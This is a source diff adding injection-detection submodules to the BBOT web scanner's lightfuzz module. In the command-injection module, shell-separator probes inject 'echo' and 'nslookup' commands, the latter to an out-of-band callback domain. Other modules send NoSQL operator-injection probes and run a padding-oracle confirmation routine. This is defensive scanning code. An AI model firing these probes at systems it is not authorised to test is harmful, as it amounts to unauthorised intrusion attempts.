b/bbot/modules/lightfuzz/submodules/base.py new file mode 100644 index 0000000000..430fa1ff4e --- /dev/null +++ b/bbot/modules/lightfuzz/submodules/base.py @@ -0,0 +1,312 @@ +import copy +import base64 +import binascii +from urllib.parse import quote + + +class BaseLightfuzz: + friendly_name = "" + uses_interactsh = False + + def __init__(self, lightfuzz, event): + self.lightfuzz = lightfuzz + self.event = event + self.results = [] + self.parameter_name = self.event.data["name"] + + @staticmethod + def is_hex(s): + try: + bytes.fromhex(s) + return True + except ValueError: + return False + + @staticmethod + def is_base64(s): + try: + if base64.b64encode(base64.b64decode(s)).decode() == s: + return True + except (binascii.Error, UnicodeDecodeError): + return False + return False + + # WEB_PARAMETER event may contain additional_params (e.g. other parameters in the same form or query string). These will be sent unchanged along with the probe. + def additional_params_process(self, additional_params, additional_params_populate_empty): + """ + Processes additional parameters by populating blank or empty values with random strings if specified. + + Parameters: + - additional_params (dict): A dictionary of additional parameters to process. + - additional_params_populate_blank_empty (bool): If True, populates blank or empty parameter values with random numeric strings. + + Returns: + - dict: A dictionary with processed additional parameters, where blank or empty values are replaced with random strings if specified. + + The function iterates over the provided additional parameters and replaces any blank or empty values with a random numeric string + of length 10, if the flag is set to True. Otherwise, it returns the parameters unchanged. + """ + if not additional_params or not additional_params_populate_empty: + return additional_params + + return { + k: self.lightfuzz.helpers.rand_string(10, numeric_only=True) if v in ("", None) else v + for k, v in additional_params.items() + } + + def conditional_urlencode(self, probe, event_type, skip_urlencoding=False): + """Conditionally url-encodes the probe if the event type requires it and encoding is not skipped by the submodule. + We also don't encode if any envelopes are present. + """ + if event_type in ["GETPARAM", "COOKIE"] and not skip_urlencoding and getattr(self.event, "envelopes", None): + # Exclude '&' from being encoded since we are operating on full query strings + return quote(probe, safe="&") + return probe + + def build_query_string(self, probe, parameter_name, additional_params=None): + """Constructs a URL with query parameters from the given probe and additional parameters.""" + url = f"{self.event.data['url']}?{parameter_name}={probe}" + if additional_params: + url = self.lightfuzz.helpers.add_get_params(url, additional_params, encode=False).geturl() + return url + + def prepare_request( + self, + event_type, + probe, + cookies, + additional_params=None, + speculative_mode="GETPARAM", + parameter_name_suffix="", + additional_params_populate_empty=False, + skip_urlencoding=False, + ): + """ + Prepares the request parameters by processing the probe and constructing the request based on the event type. + """ + + if parameter_name_suffix: + parameter_name = f"{self.parameter_name}{parameter_name_suffix}" + else: + parameter_name = self.parameter_name + additional_params = self.additional_params_process(additional_params, additional_params_populate_empty) + + # Transparently pack the probe value into the envelopes, if present + probe = self.outgoing_probe_value(probe) + + # URL Encode the probe if the event type is GETPARAM or COOKIE, if there are no envelopes, and the submodule did not opt-out with skip_urlencoding + probe = self.conditional_urlencode(probe, event_type, skip_urlencoding) + + if event_type == "SPECULATIVE": + event_type = speculative_mode + + # Construct request parameters based on the event type + if event_type == "GETPARAM": + url = self.build_query_string(probe, parameter_name, additional_params) + return {"method": "GET", "cookies": cookies, "url": url} + elif event_type == "COOKIE": + cookies_probe = {parameter_name: probe} + return {"method": "GET", "cookies": {**cookies, **cookies_probe}, "url": self.event.data["url"]} + elif event_type == "HEADER": + headers = {parameter_name: probe} + return {"method": "GET", "headers": headers, "cookies": cookies, "url": self.event.data["url"]} + elif event_type in ["POSTPARAM", "BODYJSON"]: + # Prepare data for POSTPARAM and BODYJSON event types + data = {parameter_name: probe} + if additional_params: + data.update(additional_params) + if event_type == "BODYJSON": + return {"method": "POST", "json": data, "cookies": cookies, "url": self.event.data["url"]} + else: + return {"method": "POST", "data": data, "cookies": cookies, "url": self.event.data["url"]} + + def compare_baseline( + self, + event_type, + probe, + cookies, + additional_params_populate_empty=False, + speculative_mode="GETPARAM", + skip_urlencoding=False, + parameter_name_suffix="", + parameter_name_suffix_additional_params="", + ): + """ + Compares the baseline using prepared request parameters. + """ + additional_params = copy.deepcopy(self.event.data.get("additional_params", {})) + + if additional_params and parameter_name_suffix_additional_params: + # Add suffix to each key in additional_params + additional_params = { + f"{k}{parameter_name_suffix_additional_params}": v for k, v in additional_params.items() + } + + request_params = self.prepare_request( + event_type, + probe, + cookies, + additional_params, + speculative_mode, + parameter_name_suffix, + additional_params_populate_empty, + skip_urlencoding, + ) + request_params.update({"include_cache_buster": False}) + return self.lightfuzz.helpers.http_compare(**request_params) + + async def baseline_probe(self, cookies): + """ + Executes a baseline probe to establish a baseline for comparison. + """ + if self.event.data.get("eventtype") in ["POSTPARAM", "BODYJSON"]: + method = "POST" + else: + method = "GET" + + return await self.lightfuzz.helpers.request( + method=method, + cookies=cookies, + url=self.event.data.get("url"), + allow_redirects=False, + retries=1, + timeout=10, + ) + + async def compare_probe( + self, + http_compare, + event_type, + probe, + cookies, + additional_params_populate_empty=False, + additional_params_override={}, + speculative_mode="GETPARAM", + skip_urlencoding=False, + parameter_name_suffix="", + parameter_name_suffix_additional_params="", + ): + # Deep copy to avoid modifying original additional_params + additional_params = copy.deepcopy(self.event.data.get("additional_params", {})) + + # Override additional parameters if provided + additional_params.update(additional_params_override) + + if additional_params and parameter_name_suffix_additional_params: + # Add suffix to each key in additional_params + additional_params = { + f"{k}{parameter_name_suffix_additional_params}": v for k, v in additional_params.items() + } + + # Prepare request parameters + request_params = self.prepare_request( + event_type, + probe, + cookies, + additional_params, + speculative_mode, + parameter_name_suffix, + additional_params_populate_empty, + skip_urlencoding, + ) + # Perform the comparison using the constructed request parameters + url = request_params.pop("url") + return await http_compare.compare(url, **request_params) + + async def standard_probe( + self, + event_type, + cookies, + probe, + timeout=10, + additional_params_populate_empty=False, + speculative_mode="GETPARAM", + allow_redirects=False, + skip_urlencoding=False, + ): + request_params = self.prepare_request( + event_type, + probe, + cookies, + self.event.data.get("additional_params"), + speculative_mode, + "", + additional_params_populate_empty, + skip_urlencoding, + ) + request_params.update({"allow_redirects": allow_redirects, "retries": 0, "timeout": timeout}) + self.debug(f"standard_probe requested URL: [{request_params['url']}]") + return await self.lightfuzz.helpers.request(**request_params) + + def metadata(self): + metadata_string = f"Parameter: [{self.event.data['name']}] Parameter Type: [{self.event.data['type']}]" + if self.event.data["original_value"] != "" and self.event.data["original_value"] is not None: + metadata_string += ( + f" Original Value: [{self.lightfuzz.helpers.truncate_string(self.event.data['original_value'], 200)}]" + ) + return metadata_string + + def incoming_probe_value(self, populate_empty=True): + """ + Transparently modifies the incoming probe value (the original value of the WEB_PARAMETER), given any envelopes that may have been identified, so that fuzzing within the envelopes can occur. + """ + envelopes = getattr(self.event, "envelopes", None) + probe_value = "" + if envelopes is not None: + probe_value = envelopes.get_subparam() + self.debug(f"incoming_probe_value (after unpacking): {probe_value} with envelopes [{envelopes}]") + if not probe_value: + if populate_empty is True: + probe_value = self.lightfuzz.helpers.rand_string(10, numeric_only=True) + else: + probe_value = "" + probe_value = str(probe_value) + return probe_value + + def outgoing_probe_value(self, outgoing_probe_value): + """ + Transparently modifies the outgoing probe value (fuzz probe being sent to the target), given any envelopes that may have been identified, so that fuzzing within the envelopes can occur. + """ + self.debug(f"outgoing_probe_value (before packing): {outgoing_probe_value} / {self.event}") + envelopes = getattr(self.event, "envelopes", None) + if envelopes is not None: + envelopes.set_subparam(value=outgoing_probe_value) + outgoing_probe_value = envelopes.pack() + self.debug( + f"outgoing_probe_value (after packing): {outgoing_probe_value} with envelopes [{envelopes}] / {self.event}" + ) + return outgoing_probe_value + + def get_submodule_name(self): + """Extracts the submodule name from the class name.""" + return self.__class__.__name__.replace("Lightfuzz", "").lower() + + def log(self, level, message, *args, **kwargs): + submodule_name = self.get_submodule_name() + prefixed_message = f"[{submodule_name}] {message}" + log_method = getattr(self.lightfuzz, level) + log_method(prefixed_message, *args, **kwargs) + + def debug(self, message, *args, **kwargs): + self.log("debug", message, *args, **kwargs) + + def verbose(self, message, *args, **kwargs): + self.log("verbose", message, *args, **kwargs) + + def info(self, message, *args, **kwargs): + self.log("info", message, *args, **kwargs) + + def hugeinfo(self, message, *args, **kwargs): + self.log("hugeinfo", message, *args, **kwargs) + + def warning(self, message, *args, **kwargs): + self.log("warning", message, *args, **kwargs) + + def hugewarning(self, message, *args, **kwargs): + self.log("hugewarning", message, *args, **kwargs) + + def error(self, message, *args, **kwargs): + self.log("error", message, *args, **kwargs) + + def critical(self, message, *args, **kwargs): + self.log("critical", message, *args, **kwargs) diff --git a/bbot/modules/lightfuzz/submodules/cmdi.py b/bbot/modules/lightfuzz/submodules/cmdi.py new file mode 100644 index 0000000000..3a9751b9e3 --- /dev/null +++ b/bbot/modules/lightfuzz/submodules/cmdi.py @@ -0,0 +1,91 @@ +from bbot.errors import HttpCompareError +from .base import BaseLightfuzz + +import urllib.parse + + +class cmdi(BaseLightfuzz): + friendly_name = "Command Injection" + uses_interactsh = True + + async def fuzz(self): + cookies = self.event.data.get( + "assigned_cookies", {} + ) # Retrieve assigned cookies from WEB_PARAMETER event data, if present + probe_value = self.incoming_probe_value() + + canary = self.lightfuzz.helpers.rand_string(10, numeric_only=True) + http_compare = self.compare_baseline( + self.event.data["type"], probe_value, cookies + ) # Initialize the http_compare object and establish a baseline HTTP response + + cmdi_probe_strings = [ + "AAAA", # False positive probe + ";", + "&&", + "||", + "&", + "|", + ] + + positive_detections = [] + for p in cmdi_probe_strings: + try: + # add "echo" to the cmdi probe value to construct the command to be executed + echo_probe = f"{probe_value}{p} echo {canary} {p}" + # we have to handle our own URL-encoding here, because our payloads include the & character + if self.event.data["type"] == "GETPARAM": + echo_probe = urllib.parse.quote(echo_probe.encode(), safe="") + + # send cmdi probe and compare with baseline response + cmdi_probe = await self.compare_probe( + http_compare, self.event.data["type"], echo_probe, cookies, skip_urlencoding=True + ) + + # ensure we received an HTTP response + if cmdi_probe[3]: + # check if the canary is in the response and the word "echo" is NOT in the response text, ruling out mere reflection of the entire probe value without execution + if canary in cmdi_probe[3].text and "echo" not in cmdi_probe[3].text: + self.debug(f"canary [{canary}] found in response when sending probe [{p}]") + if p == "AAAA": # Handle detection false positive probe + self.warning( + f"False Postive Probe appears to have been triggered for {self.event.data['url']}, aborting remaining detection" + ) + return + positive_detections.append(p) # Add detected probes to positive detections + except HttpCompareError as e: + self.debug(e) + continue + if len(positive_detections) > 0: + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE OS Command Injection. {self.metadata()} Detection Method: [echo canary] CMD Probe Delimeters: [{' '.join(positive_detections)}]", + } + ) + + # Blind OS Command Injection + if self.lightfuzz.interactsh_instance: + self.lightfuzz.event_dict[self.event.data["url"]] = self.event # Store the event associated with the URL + for p in cmdi_probe_strings: + # generate a random subdomain tag and associate it with the event, type, name, and probe + subdomain_tag = self.lightfuzz.helpers.rand_string(4, digits=False) + self.lightfuzz.interactsh_subdomain_tags[subdomain_tag] = { + "event": self.event, + "type": self.event.data["type"], + "name": self.event.data["name"], + "probe": p, + } + # payload is an nslookup command that includes the interactsh domain prepended the previously generated subdomain tag + interactsh_probe = f"{p} nslookup {subdomain_tag}.{self.lightfuzz.interactsh_domain} {p}" + # we have to handle our own URL-encoding here, because our payloads include the & character + if self.event.data["type"] == "GETPARAM": + interactsh_probe = urllib.parse.quote(interactsh_probe.encode(), safe="") + # we send the probe here, and any positive detections are processed in the interactsh_callback defined in lightfuzz.py + await self.standard_probe( + self.event.data["type"], + cookies, + f"{probe_value}{interactsh_probe}", + timeout=15, + skip_urlencoding=True, + ) diff --git a/bbot/modules/lightfuzz/submodules/crypto.py b/bbot/modules/lightfuzz/submodules/crypto.py new file mode 100644 index 0000000000..67fed302f9 --- /dev/null +++ b/bbot/modules/lightfuzz/submodules/crypto.py @@ -0,0 +1,457 @@ +import base64 +import hashlib +from .base import BaseLightfuzz +from bbot.errors import HttpCompareError +from urllib.parse import unquote, quote + + +# Global cache for compiled YARA rules +_compiled_rules_cache = None + + +class crypto(BaseLightfuzz): + """ + Although we have an envelope system to detect hex and base64 encoded parameter values, those are only assigned when they decode to a valid string. + Since crypto values (and serialized objects) will not decode properly, we need a more concise check here to determine how to process them. + """ + + friendly_name = "Cryptography Probe" + + @staticmethod + def is_hex(s): + try: + bytes.fromhex(s) + return True + except ValueError: + return False + + @staticmethod + def is_base64(s): + try: + if base64.b64encode(base64.b64decode(s)).decode() == s: + return True + except Exception: + return False + return False + + # A list of YARA rules for detecting cryptographic error messages + crypto_error_strings = [ + "invalid mac", + "padding is invalid", + "bad data", + "length of the data to decrypt is invalid", + "specify a valid key size", + "invalid algorithm specified", + "object already exists", + "key does not exist", + "the parameter is incorrect", + "cryptography exception", + "access denied", + "unknown error", + "invalid provider type", + "no valid cert found", + "cannot find the original signer", + "signature description could not be created", + "crypto operation failed", + "OpenSSL Error", + ] + + @property + def compiled_rules(self): + """ + We need to cache the compiled YARA rule globally since lightfuzz submodules are recreated for every handle_event + """ + global _compiled_rules_cache + if _compiled_rules_cache is None: + _compiled_rules_cache = self.lightfuzz.helpers.yara.compile_strings(self.crypto_error_strings, nocase=True) + return _compiled_rules_cache + + @staticmethod + def format_agnostic_decode(input_string, urldecode=False): + """ + Decodes a string from either hex or base64 (without knowing which first), and optionally URL-decoding it first. + + Parameters: + - input_string (str): The string to decode. + - urldecode (bool): If True, URL-decodes the input first. + + Returns: + - tuple: (decoded data, encoding type: 'hex', 'base64', or 'unknown'). + """ + encoding = "unknown" + if urldecode: + input_string = unquote(input_string) + if BaseLightfuzz.is_hex(input_string): + data = bytes.fromhex(input_string) + encoding = "hex" + elif BaseLightfuzz.is_base64(input_string): + data = base64.b64decode(input_string) + encoding = "base64" + else: + data = str + return data, encoding + + @staticmethod + def format_agnostic_encode(data, encoding, urlencode=False): + """ + Encodes data into hex or base64, with optional URL-encoding. + + Parameters: + - data (bytes): The data to encode. + - encoding (str): The encoding type ('hex' or 'base64'). + - urlencode (bool): If True, URL-encodes the result. + + Returns: + - str: The encoded data as a string. + + Raises: + - ValueError: If an unsupported encoding type is specified. + """ + if encoding == "hex": + encoded_data = data.hex() + elif encoding == "base64": + encoded_data = base64.b64encode(data).decode("utf-8") # base64 encoding returns bytes, decode to string + else: + raise ValueError("Unsupported encoding type specified") + if urlencode: + return quote(encoded_data) + return encoded_data + + @staticmethod + def modify_string(input_string, action="truncate", position=None, extension_length=1): + """ + Modifies a cryptographic string by either truncating it, mutating a byte at a specified position, or extending it with null bytes. + + Parameters: + - input_string (str): The string to modify. + - action (str): The action to perform ('truncate', 'mutate', 'extend'). + - position (int): The position to mutate (only used if action is 'mutate'). + - extension_length (int): The number of null bytes to add if action is 'extend'. + + Returns: + - str: The modified string. + """ + if not isinstance(input_string, str): + input_string = str(input_string) + + data, encoding = crypto.format_agnostic_decode(input_string) + if encoding != "base64" and encoding != "hex": + raise ValueError("Input must be either hex or base64 encoded") + + if action == "truncate": + modified_data = data[:-1] # Remove the last byte + elif action == "mutate": + if not position: + position = len(data) // 2 + if position < 0 or position >= len(data): + raise ValueError("Position out of range") + byte_list = list(data) + byte_list[position] = (byte_list[position] + 1) % 256 + modified_data = bytes(byte_list) + elif action == "extend": + modified_data = data + (b"\x00" * extension_length) + elif action == "flip": + if not position: + position = len(data) // 2 + if position < 0 or position >= len(data): + raise ValueError("Position out of range") + byte_list = list(data) + byte_list[position] ^= 0xFF # Flip all bits in the byte at the specified position + modified_data = bytes(byte_list) + else: + raise ValueError("Unsupported action") + return crypto.format_agnostic_encode(modified_data, encoding) + + # Check if the entropy of the data is greater than the threshold, indicating it is likely encrypted + def is_likely_encrypted(self, data, threshold=4.5): + entropy = self.lightfuzz.helpers.calculate_entropy(data) + return entropy >= threshold + + # Perform basic cryptanalysis on the input string, attempting to determine if it is likely encrypted and if it is a block cipher + def cryptanalysis(self, input_string): + likely_crypto = False + possible_block_cipher = False + data, encoding = self.format_agnostic_decode(input_string) + likely_crypto = self.is_likely_encrypted(data) + data_length = len(data) + if data_length % 8 == 0: + possible_block_cipher = True + return likely_crypto, possible_block_cipher + + # Determine possible block sizes for a given ciphertext length + @staticmethod + def possible_block_sizes(ciphertext_length): + potential_block_sizes = [8, 16] + possible_sizes = [] + for block_size in potential_block_sizes: + num_blocks = ciphertext_length // block_size + if ciphertext_length % block_size == 0 and num_blocks >= 2: + possible_sizes.append(block_size) + return possible_sizes + + async def padding_oracle_execute(self, original_data, encoding, block_size, cookies, possible_first_byte=True): + """ + Execute the padding oracle attack for a given block size. + The goal here is not actual exploitation (arbitrary encryption or decryption), but rather to definitively confirm whether padding oracle vulnerability exists and is exploitable. + + Parameters: + - original_data (bytes): The original ciphertext data. + - encoding (str): The encoding type ('hex' or 'base64'). + - block_size (int): The block size to use for the padding oracle attack. + - cookies (dict): Cookies to include, if any + - possible_first_byte (bool): If True, use the first byte as the baseline byte. + + Returns: + - bool: True if the padding oracle attack is successful. + """ + ivblock = b"\x00" * block_size # initialize the IV block with null bytes + paddingblock = b"\x00" * block_size # initialize the padding block with null bytes + datablock = original_data[-block_size:] # extract the last block of the original data + + # This handling the 1/255 chance that the first byte is correct padding which would cause a false negative. + if possible_first_byte: + baseline_byte = b"\xff" # set the baseline byte to 0xff + starting_pos = 0 # set the starting position to 0 + else: + baseline_byte = b"\x00" # set the baseline byte to 0x00 + starting_pos = 1 # set the starting position to 1 + # first obtain + baseline = self.compare_baseline( + self.event.data["type"], + self.format_agnostic_encode(ivblock + paddingblock[:-1] + baseline_byte + datablock, encoding), + cookies, + ) + differ_count = 0 + # for each possible byte value, send a probe and check if the response is different + for i in range(starting_pos, starting_pos + 254): + byte = bytes([i]) + oracle_probe = await self.compare_probe( + baseline, + self.event.data["type"], + self.format_agnostic_encode(ivblock + paddingblock[:-1] + byte + datablock, encoding), + cookies, + ) + # oracle_probe[0] will be false if the response is different - oracle_probe[1] stores what aspect of the response is different (headers, body, code) + if oracle_probe[0] is False and "body" in oracle_probe[1]: + differ_count += 1 + + if i == 2: + if possible_first_byte is True: + # Thats two results which appear "different". Since this is the first run, it's entirely possible \x00 was the correct padding. + # We will break from this loop and redo it with the last byte as the baseline instead of the first + return None + else: + # Now that we have tried the run twice, we know it can't be because the first byte was the correct padding, and we know it is not vulnerable + return False + # A padding oracle vulnerability will produce exactly one different response, and no more, so this is likely a real padding oracle + if differ_count == 1: + return True + return False + + async def padding_oracle(self, probe_value, cookies): + data, encoding = self.format_agnostic_decode(probe_value) + possible_block_sizes = self.possible_block_sizes( + len(data) + ) # determine possible block sizes for the ciphertext + + for block_size in possible_block_sizes: + padding_oracle_result = await self.padding_oracle_execute(data, encoding, block_size, cookies) + # if we get a negative result first, theres a 1/255 change it's a false negative. To rule that out, we must retry again with possible_first_byte set to false + if padding_oracle_result is None: + self.debug("still could be in a possible_first_byte situation - retrying with different first byte") + padding_oracle_result = await self.padding_oracle_execute( + data, encoding, block_size, cookies, possible_first_byte=False + ) + + if padding_oracle_result is True: + context = f"Lightfuzz Cryptographic Probe Submodule detected a probable padding oracle vulnerability after manipulating parameter: [{self.event.data['name']}]" + self.results.append( + { + "type": "VULNERABILITY", + "severity": "HIGH", + "description": f"Padding Oracle Vulnerability. Block size: [{str(block_size)}] {self.metadata()}", + "context": context, + } + ) + + async def error_string_search(self, text_dict, baseline_text): + """ + Search for cryptographic error strings using YARA rules in the provided text dictionary and baseline text. + """ + matching_techniques = set() + matching_strings = set() + + # Check each manipulation technique + for label, text in text_dict.items(): + matches = await self.lightfuzz.helpers.yara.match(self.compiled_rules, text) + if matches: + matching_techniques.add(label) + for matched_string in matches: + matching_strings.add(matched_string) + + # Check for false positives by scanning baseline text + context = f"Lightfuzz Cryptographic Probe Submodule detected a cryptographic error after manipulating parameter: [{self.event.data['name']}]" + if matching_strings: + baseline_matches = await self.lightfuzz.helpers.yara.match(self.compiled_rules, baseline_text) + baseline_strings = set() + for matched_string in baseline_matches: + baseline_strings.add(matched_string) + + # Only report strings that weren't in the baseline + unique_matches = matching_strings - baseline_strings + if unique_matches: + self.results.append( + { + "type": "FINDING", + "description": f"Possible Cryptographic Error. {self.metadata()} Strings: [{','.join(unique_matches)}] Detection Technique(s): [{','.join(matching_techniques)}]", + "context": context, + } + ) + + else: + self.debug( + f"Aborting cryptographic error reporting - baseline_text already contained detected string(s) ({','.join(baseline_strings)})" + ) + + # Identify the hash function based on the length of the hash + @staticmethod + def identify_hash_function(hash_bytes): + hash_length = len(hash_bytes) + hash_functions = { + 16: hashlib.md5, + 20: hashlib.sha1, + 32: hashlib.sha256, + 48: hashlib.sha384, + 64: hashlib.sha512, + } + + if hash_length in hash_functions: + return hash_functions[hash_length] + + async def fuzz(self): + cookies = self.event.data.get("assigned_cookies", {}) + probe_value = self.incoming_probe_value(populate_empty=False) + + if not probe_value: + self.debug( + f"The Cryptography Probe Submodule requires original value, aborting [{self.event.data['type']}] [{self.event.data['name']}]" + ) + return + + # obtain the baseline probe to compare against + baseline_probe = await self.baseline_probe(cookies) + if not baseline_probe: + self.verbose(f"Couldn't get baseline_probe for url {self.event.data['url']}, aborting") + return + + # perform the manipulation techniques + try: + truncate_probe_value = self.modify_string(probe_value, action="truncate") + mutate_probe_value = self.modify_string(probe_value, action="mutate") + except ValueError as e: + self.debug(f"Encountered error modifying value for parameter [{self.event.data['name']}]: {e} , aborting") + return + + # Basic crypanalysis + likely_crypto, possible_block_cipher = self.cryptanalysis(probe_value) + + # if the value is not likely to be cryptographic, we can skip the rest of the tests + if not likely_crypto: + self.debug("Parameter value does not appear to be cryptographic, aborting tests") + return + + # Cryptographic Response Divergence Test + + http_compare = self.compare_baseline(self.event.data["type"], probe_value, cookies) + try: + arbitrary_probe = await self.compare_probe(http_compare, self.event.data["type"], "AAAAAAA", cookies) # + truncate_probe = await self.compare_probe( + http_compare, self.event.data["type"], truncate_probe_value, cookies + ) # manipulate the value by truncating a byte + mutate_probe = await self.compare_probe( + http_compare, self.event.data["type"], mutate_probe_value, cookies + ) # manipulate the value by mutating a byte in place + except HttpCompareError as e: + self.verbose(f"Encountered HttpCompareError Sending Compare Probe: {e}") + return + + confirmed_techniques = [] + # mutate_probe[0] will be false if the response is different - mutate_probe[1] stores what aspect of the response is different (headers, body, code) + # ensure the difference is in the body and not the headers or code + # if the body is different and not empty, we have confirmed that single-byte mutation affected the response body + if mutate_probe[0] is False and "body" in mutate_probe[1]: + if (http_compare.compare_body(mutate_probe[3].text, arbitrary_probe[3].text) is False) or mutate_probe[ + 3 + ].text == "": + confirmed_techniques.append("Single-byte Mutation") + + # if the body is different and not empty, we have confirmed that byte truncation affected the response body + if truncate_probe[0] is False and "body" in truncate_probe[1]: + if (http_compare.compare_body(truncate_probe[3].text, arbitrary_probe[3].text) is False) or truncate_probe[ + 3 + ].text == "": + confirmed_techniques.append("Data Truncation") + + if confirmed_techniques: + context = f"Lightfuzz Cryptographic Probe Submodule detected a parameter ({self.event.data['name']}) to appears to drive a cryptographic operation" + self.results.append( + { + "type": "FINDING", + "description": f"Probable Cryptographic Parameter. {self.metadata()} Detection Technique(s): [{', '.join(confirmed_techniques)}]", + "context": context, + } + ) + + # Cryptographic Error String Test + # Check if cryptographic error strings are present in the response after performing the manipulation techniques + await self.error_string_search( + {"truncate value": truncate_probe[3].text, "mutate value": mutate_probe[3].text}, baseline_probe.text + ) + # if we have any confirmed techniques, or the word "padding" is in the response, we need to check for a padding oracle + if confirmed_techniques or ( + "padding" in truncate_probe[3].text.lower() or "padding" in mutate_probe[3].text.lower() + ): + # Padding Oracle Test + if possible_block_cipher: + self.debug( + "Attempting padding oracle exploit since it looks like a block cipher and we have confirmed crypto" + ) + await self.padding_oracle(probe_value, cookies) + + # Hash identification / Potential Length extension attack + data, encoding = crypto.format_agnostic_decode(probe_value) + # see if its possible that a given value is a hash, and if so, which one + hash_function = self.identify_hash_function(data) + if hash_function: + hash_instance = hash_function() + # if there are any hash functions which match the length, we check the additional parameters to see if they cause identical changes + # this would indicate they are being used to generate the hash + if ( + hash_function + and "additional_params" in self.event.data.keys() + and self.event.data["additional_params"] + ): + # for each additional parameter, we send a probe and check if it causes the same change in the response as the original probe + for additional_param_name, additional_param_value in self.event.data["additional_params"].items(): + try: + additional_param_probe = await self.compare_probe( + http_compare, + self.event.data["type"], + probe_value, + cookies, + additional_params_override={additional_param_name: additional_param_value + "A"}, + ) + except HttpCompareError as e: + self.verbose(f"Encountered HttpCompareError Sending Compare Probe: {e}") + continue + # the additional parameter affects the potential hash parameter (suggesting its calculated in the hash) + # This is a potential length extension attack + if additional_param_probe[0] is False and (additional_param_probe[1] == mutate_probe[1]): + context = f"Lightfuzz Cryptographic Probe Submodule detected a parameter ({self.event.data['name']}) that is a likely a hash, which is connected to another parameter {additional_param_name})" + self.results.append( + { + "type": "FINDING", + "description": f"Possible {self.event.data['type']} parameter with {hash_instance.name.upper()} Hash as value. {self.metadata()}, linked to additional parameter [{additional_param_name}]", + "context": context, + } + ) diff --git a/bbot/modules/lightfuzz/submodules/nosqli.py b/bbot/modules/lightfuzz/submodules/nosqli.py new file mode 100644 index 0000000000..3bbea687a8 --- /dev/null +++ b/bbot/modules/lightfuzz/submodules/nosqli.py @@ -0,0 +1,169 @@ +from .base import BaseLightfuzz +from bbot.errors import HttpCompareError +import urllib.parse + + +class nosqli(BaseLightfuzz): + """ + NoSQLi Lightfuzz module + """ + + friendly_name = "NoSQL Injection" + + async def fuzz(self): + cookies = self.event.data.get("assigned_cookies", {}) + probe_value = self.incoming_probe_value(populate_empty=True) + quote_probe_baseline = None + try: + quote_probe_baseline = self.compare_baseline( + self.event.data["type"], probe_value, cookies, additional_params_populate_empty=True + ) + except HttpCompareError as e: + self.verbose(f"Encountered HttpCompareError Sending Compare Baseline: {e}") + + if quote_probe_baseline: + try: + # send the with a single quote, and then another with an escaped single quote + ( + single_quote_comparison, + single_quote_diff_reasons, + single_quote_reflection, + single_quote_response, + ) = await self.compare_probe( + quote_probe_baseline, + self.event.data["type"], + f"{probe_value}'", + cookies, + additional_params_populate_empty=True, + ) + ( + escaped_single_quote_comparison, + escaped_single_quote_diff_reasons, + escaped_single_quote_reflection, + escaped_single_quote_response, + ) = await self.compare_probe( + quote_probe_baseline, + self.event.data["type"], + rf"{probe_value}\'", + cookies, + additional_params_populate_empty=True, + ) + if not single_quote_comparison and single_quote_response and escaped_single_quote_response: + # if the single quote probe changed the code or body, and the escaped single quote probe did not cause the same change, injection is possible + if ("code" in single_quote_diff_reasons or "body" in single_quote_diff_reasons) and ( + single_quote_diff_reasons != escaped_single_quote_diff_reasons + ): + self.verbose( + "Initial heuristic indicates possible NoSQL Injection, sending confirmation probes" + ) + confirm_baseline = self.compare_baseline( + self.event.data["type"], + urllib.parse.quote(f"{probe_value}' && 0 && 'x", safe=""), + cookies, + additional_params_populate_empty=True, + skip_urlencoding=True, + ) + ( + confirmation_probe_false_comparison, + confirmation_probe_false_diff_reasons, + confirmation_probe_false_reflection, + confirmation_probe_false_response, + ) = await self.compare_probe( + confirm_baseline, + self.event.data["type"], + urllib.parse.quote(f"{probe_value}' && 1 && 'x", safe=""), + cookies, + additional_params_populate_empty=True, + skip_urlencoding=True, + ) + if confirmation_probe_false_response: + if not confirmation_probe_false_comparison and confirmation_probe_false_diff_reasons != [ + "header" + ]: + ( + final_confirm_comparison, + final_confirm_diff_reasons, + final_confirm_reflection, + final_confirm_response, + ) = await self.compare_probe( + confirm_baseline, + self.event.data["type"], + urllib.parse.quote(f"{probe_value}' && 0 && 'x", safe=""), + cookies, + additional_params_populate_empty=True, + skip_urlencoding=True, + ) + + if final_confirm_response and final_confirm_comparison: + self.results.append( + { + "type": "FINDING", + "description": f"Possible NoSQL Injection. {self.metadata()} Detection Method: [Quote/Escaped Quote + Conditional Affect] Differences: [{'.'.join(confirmation_probe_false_diff_reasons)}]", + } + ) + else: + self.verbose( + "Aborted reporting Possible NoSQL Injection, due to unstable/inconsistent responses" + ) + + except HttpCompareError as e: + self.verbose(f"Encountered HttpCompareError Sending Compare Probe: {e}") + + # Comparison operator injection + if self.event.data["type"] in ["POSTPARAM", "GETPARAM"]: + nosqli_negation_baseline = None + + try: + nosqli_negation_baseline = self.compare_baseline( + self.event.data["type"], + f"{probe_value}'", + cookies, + additional_params_populate_empty=True, + parameter_name_suffix="[$eq]", + parameter_name_suffix_additional_params="[$eq]", + ) + except HttpCompareError as e: + self.verbose(f"Encountered HttpCompareError Sending Compare Baseline: {e}") + + if nosqli_negation_baseline: + try: + ( + nosqli_negate_comparison, + nosqli_negate_diff_reasons, + nosqli_negate_reflection, + nosqli_negate_response, + ) = await self.compare_probe( + nosqli_negation_baseline, + self.event.data["type"], + f"{probe_value}'", + cookies, + additional_params_populate_empty=True, + parameter_name_suffix="[$ne]", + parameter_name_suffix_additional_params="[$ne]", + ) + if nosqli_negate_response: + if not nosqli_negate_comparison and nosqli_negate_diff_reasons != ["header"]: + # If we are about to report a finding, rule out a false positive from unstable URL by sending another probe with the baseline values, and ensure those dont also come back as different + ( + nosqli_negate_comfirm_comparison, + nosqli_negate_confirm_diff_reasons, + nosqli_negate_confirm_reflection, + nosqli_negate_confirm_response, + ) = await self.compare_probe( + nosqli_negation_baseline, + self.event.data["type"], + f"{probe_value}'", + cookies, + additional_params_populate_empty=True, + parameter_name_suffix="[$eq]", + parameter_name_suffix_additional_params="[$eq]", + ) + if nosqli_negate_comfirm_comparison: + self.results.append( + { + "type": "FINDING", + "description": f"Possible NoSQL Injection. {self.metadata()} Detection Method: [Parameter Name Operator Injection - Negation ([$ne])] Differences: [{'.'.join(nosqli_negate_diff_reasons)}]", + } + ) + except HttpCompareError as e: + self.verbose(f"Encountered HttpCompareError Sending Compare Probe: {e}") diff --git a/bbot/modules/lightfuzz/submodules/path.py b/bbot/modules/lightfuzz/submodules/path.py new file mode 100644 index 0000000000..75c9d0d28b --- /dev/null +++ b/bbot/modules/lightfuzz/submodules/path.py @@ -0,0 +1,136 @@ +from .base import BaseLightfuzz +from bbot.errors import HttpCompareError + +import re 